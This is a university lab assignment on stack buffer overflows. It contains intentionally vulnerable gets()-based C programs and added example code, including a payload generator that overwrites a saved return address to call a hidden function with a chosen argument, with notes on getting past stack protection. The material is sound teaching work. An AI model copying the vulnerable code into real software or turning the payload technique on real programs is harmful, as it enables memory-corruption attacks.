CSE 334/434: Software System Security, Fall 2012


Experiencing Buffer Overflows

Part 1 (1 points)

Search the web and fill in the blanks below.

"If you were to use a buffer overflow attack to knowingly gain unauthorized access or to cause damage to other people's computers, the Computer Fraud and Abuse Act provides a maximum penalty of ____ years in prison for a first offense. It was amended by USA PATRIOT Act later to provide a maximum penalty of ____ years for a first offense."

Part 2

Read the document Smashing The Stack For Fun And Profit by Aleph One.

Parts 3 and 4 are required for all students. Part 5 is required for CSE 434 students. The bonus question (Part 6) is for 434 students only. You must do Parts 3 to 5 on the server edgar.cse.lehigh.edu and compile the programs with gcc, because the result depends on the exact compiler and operating system you use. The edgar server is an Intel machine running Linux.

Part 3 (3 points)

We have the following program, lucky.c, that generates lucky numbers. It takes a password as input but always refuses to generate a lucky number. Luckily, the program is vulnerable to a buffer overrun in the goodPassword() procedure. The goal is to take advantage of the vulnerability so that the program generates lucky numbers for us.

#include <stdio.h>
#include <sys/time.h>
#include <stdlib.h>

int *ret;

char goodPassword() {
  int good='N';
  char Password[100]; // Memory storage for the password
  gets(Password); // Get input from keyboard

  return (char)good;
}

int main() {
  struct timeval t;

  printf("Enter your password:");

  if (goodPassword() == 'Y') {
    gettimeofday(&t, 0);
    srand((unsigned int) t.tv_usec);
    printf("Your lucky number today is %d!\n", rand()%100);
  }
  else {
    printf("No lucky numbers for you today.\n");
    exit(-1);
  }

  return 0;
}

For Part 3, figure out a password that makes the program output a lucky number. Explain how your password works. Hint: there is no need to overwrite the return address for Part 3; there is another easy target to overwrite in this program.

Compile the above program using "gcc lucky.c -o lucky" and verify your password works on the generated executable; ignore the warning about gets from gcc.
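The mechanism behind Part 3, shown as an added example that is not part of the original assignment: gets() keeps writing past the end of Password, so whatever the compiler placed right after the buffer gets overwritten by the tail of the input. The program below models goodPassword()'s frame as a struct (the 100-byte buffer followed by good, with no padding, which is an assumption; the real distance on edgar is what you measure with gdb), replaces gets() with an unchecked memcpy that behaves the same way, and puts the bounded read that fixes the bug beside it.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Model of goodPassword()'s stack frame: the 100-byte Password buffer
 * with the int that holds the verdict right behind it. In the real frame
 * the compiler may leave padding between them (which is why the offset
 * is measured in gdb), but the overwrite works the same way. */
struct frame {
    char password[100];
    int  good;
};

/* Distance from the start of Password to good in this model. The real
 * value on edgar is whatever gdb reports, not necessarily 100. */
size_t good_offset(void) {
    return offsetof(struct frame, good);
}

/* Stand-in for gets(): copies every input byte into the frame with no
 * bounds check, so bytes past the 100th land in good. Capped at the size
 * of the model so the demonstration itself stays in bounds. */
static void unchecked_read(struct frame *f, const unsigned char *in, size_t n) {
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy(f, in, n);
}

/* The vulnerable verdict, as in lucky.c: return the low byte of good. */
char verdict_vulnerable(const unsigned char *in, size_t n) {
    struct frame f;
    f.good = 'N';
    unchecked_read(&f, in, n);
    return (char)f.good;
}

/* The hardened verdict: a bounded, NUL-terminated read that can never
 * touch good. In lucky.c the one-line fix is
 * fgets(Password, sizeof Password, stdin) in place of gets(Password). */
char verdict_hardened(const unsigned char *in, size_t n) {
    struct frame f;
    f.good = 'N';
    if (n > sizeof f.password - 1)
        n = sizeof f.password - 1;
    memcpy(f.password, in, n);
    f.password[n] = '\0';
    return (char)f.good;
}

/* Verdict for an input made of n copies of byte c (constructed input),
 * through the vulnerable path or the hardened one. */
char verdict_for_run(size_t n, unsigned char c, int hardened) {
    unsigned char in[sizeof(struct frame)];
    memset(in, c, sizeof in);
    return hardened ? verdict_hardened(in, n) : verdict_vulnerable(in, n);
}

int main(void) {
    printf("good sits %zu bytes after Password in this model\n", good_offset());
    printf("100 bytes of 'Y', gets-style : %c\n", verdict_for_run(100, 'Y', 0));
    printf("104 bytes of 'Y', gets-style : %c\n", verdict_for_run(104, 'Y', 0));
    printf("104 bytes of 'Y', fgets-style: %c\n", verdict_for_run(104, 'Y', 1));
    return 0;
}
```

Filling all four bytes of good with 'Y' works on any byte order, because every byte is 0x59 and the return casts to char. Overwriting only the first byte past the buffer also works on edgar's little-endian Intel CPU, since that byte is the low byte the cast keeps; the hardened path returns 'N' no matter how long the input is.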

Part 4 (3 points)

Suppose you are allowed to add some code between "gets(Password);" and "return (char)good;" in the goodPassword() procedure. We intend to use the following code template to modify the return address on the stack so that the program jumps directly to the THEN branch without checking the result of goodPassword():
ret=(int *) ((int) Password+?);
*ret = *ret + ?;
Each ? above represents an integer constant. Figure out these constants. You will need gdb to find the offset between the Password buffer and the return address on the stack, and to find how far the return address must be moved to land in the THEN branch. An on-paper calculation probably won't work, as the stack layout depends on the compiler.

Part 5 (3 points)

We modify the original program to add a secret function, as shown below.

#include <stdio.h>
#include <sys/time.h>
#include <stdlib.h>

int *ret;

char goodPassword() {
  int good='N';
  char Password[100]; // Memory storage for the password
  gets(Password); // Get input from keyboard

  return (char)good;
}

void secret (char ch) {
  printf("\nThis is the secret character: %c\n", ch);
}

int main() {
  struct timeval t;

  printf("Enter your password:");

  if (goodPassword() == 'Y') {
    gettimeofday(&t, 0);
    srand((unsigned int) t.tv_usec);
    printf("Your lucky number today is %d!\n", rand()%100);
  }
  else {
    printf("No lucky number for you today.\n");
    exit(-1);
  }

  return 0;
}

Now figure out a password that makes the program call the secret function.

Notes:

Bonus question (2 points)

Continuing from Part 5, suppose now we'd like the output message to be "This is the secret character: C". That is, the output character should be "C". Can you figure out a password to do this? Hint: put the character at the place on the stack where the secret function expects its parameter.
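The shape of the input Part 5 and the bonus question call for, as an added example that is not part of the original assignment: once the saved return address is overwritten with the address of secret(), the ret instruction pops that slot, so when secret() starts running it finds the next slot where it expects its own return address and the slot after that where it expects its first argument. The generator below lays the line out that way. It assumes the 32-bit x86 calling convention the assignment's int-sized pointers imply (4-byte stack slots, first argument on the stack); the offset 116, the address 0x080484b4 and the fake return address 0x41414141 are constructed placeholders, and the real values come from gdb on edgar (the offset from the same measurement Part 4 needs, the address from "print secret").

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Store a 32-bit value the way an x86 stack slot holds it: little-endian. */
static void put_le32(unsigned char *p, uint32_t v) {
    p[0] = (unsigned char)(v);
    p[1] = (unsigned char)(v >> 8);
    p[2] = (unsigned char)(v >> 16);
    p[3] = (unsigned char)(v >> 24);
}

/* Lay out the line gets() will store into Password:
 *
 *   [ filler: off_ret bytes ][ &secret ][ fake return ][ argument slot ]
 *
 * off_ret  : bytes from the start of Password to goodPassword()'s saved
 *            return address (measured with gdb).
 * secret   : address of secret() (gdb: print secret).
 * fake_ret : what secret() will "return" to; it only matters after the
 *            message has already been printed.
 * arg      : the character secret() should print. On 32-bit x86 a
 *            function finds its return address at [esp] and its first
 *            argument at [esp+4] on entry, so the argument slot comes
 *            right after the fake return address; only its low byte is
 *            used for a char parameter.
 *
 * Returns the payload length, or 0 if it cannot be delivered through
 * gets(): a 0x0a byte would end the line early. NUL bytes are fine for
 * gets() (it stops only at newline or EOF) but would not survive
 * strcpy-style delivery.
 */
size_t build_payload(unsigned char *out, size_t outsz,
                     size_t off_ret, uint32_t secret, uint32_t fake_ret, char arg) {
    size_t len = off_ret + 4 + 4 + 4;
    if (len > outsz)
        return 0;
    memset(out, 'A', off_ret);                /* filler; its content is irrelevant */
    put_le32(out + off_ret, secret);          /* replaces the saved return address */
    put_le32(out + off_ret + 4, fake_ret);    /* what secret() sees as its return address */
    put_le32(out + off_ret + 8, (uint32_t)(unsigned char)arg);  /* argument slot */
    for (size_t i = 0; i < len; i++)
        if (out[i] == '\n')
            return 0;
    return len;
}

int main(void) {
    /* Constructed values for illustration only; take the real ones from gdb on edgar. */
    unsigned char payload[256];
    size_t n = build_payload(payload, sizeof payload, 116, 0x080484b4u, 0x41414141u, 'C');
    if (n == 0) {
        fprintf(stderr, "payload would contain a newline; cannot deliver via gets()\n");
        return 1;
    }
    fwrite(payload, 1, n, stdout);   /* deliver with a pipe: ./payload | ./lucky */
    putchar('\n');                   /* terminate the line for gets() */
    return 0;
}
```

The address bytes are not printable, so the line has to be piped in rather than typed. The program crashes when secret() returns to 0x41414141, but only after the message is out, which is all Part 5 asks for. Two caveats for anyone trying this on a newer toolchain than edgar's: gcc's stack protector (disable with -fno-stack-protector) aborts on a smashed return address before ret runs, and on x86-64 the saved return address is 8 bytes and the first argument travels in a register, so the argument-slot trick from the hint no longer applies as written; the address of secret() in a non-PIE executable is fixed, so ASLR does not get in the way.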

Tools you may need

What you need to submit

Submit your work through CourseSite. The deadline is Sept 14th, 6pm. The submission should be a text file that contains the answers to the required parts and an explanation of how your answers achieve the desired results.


Author: Gang Tan, Lehigh University, 2012. All rights reserved.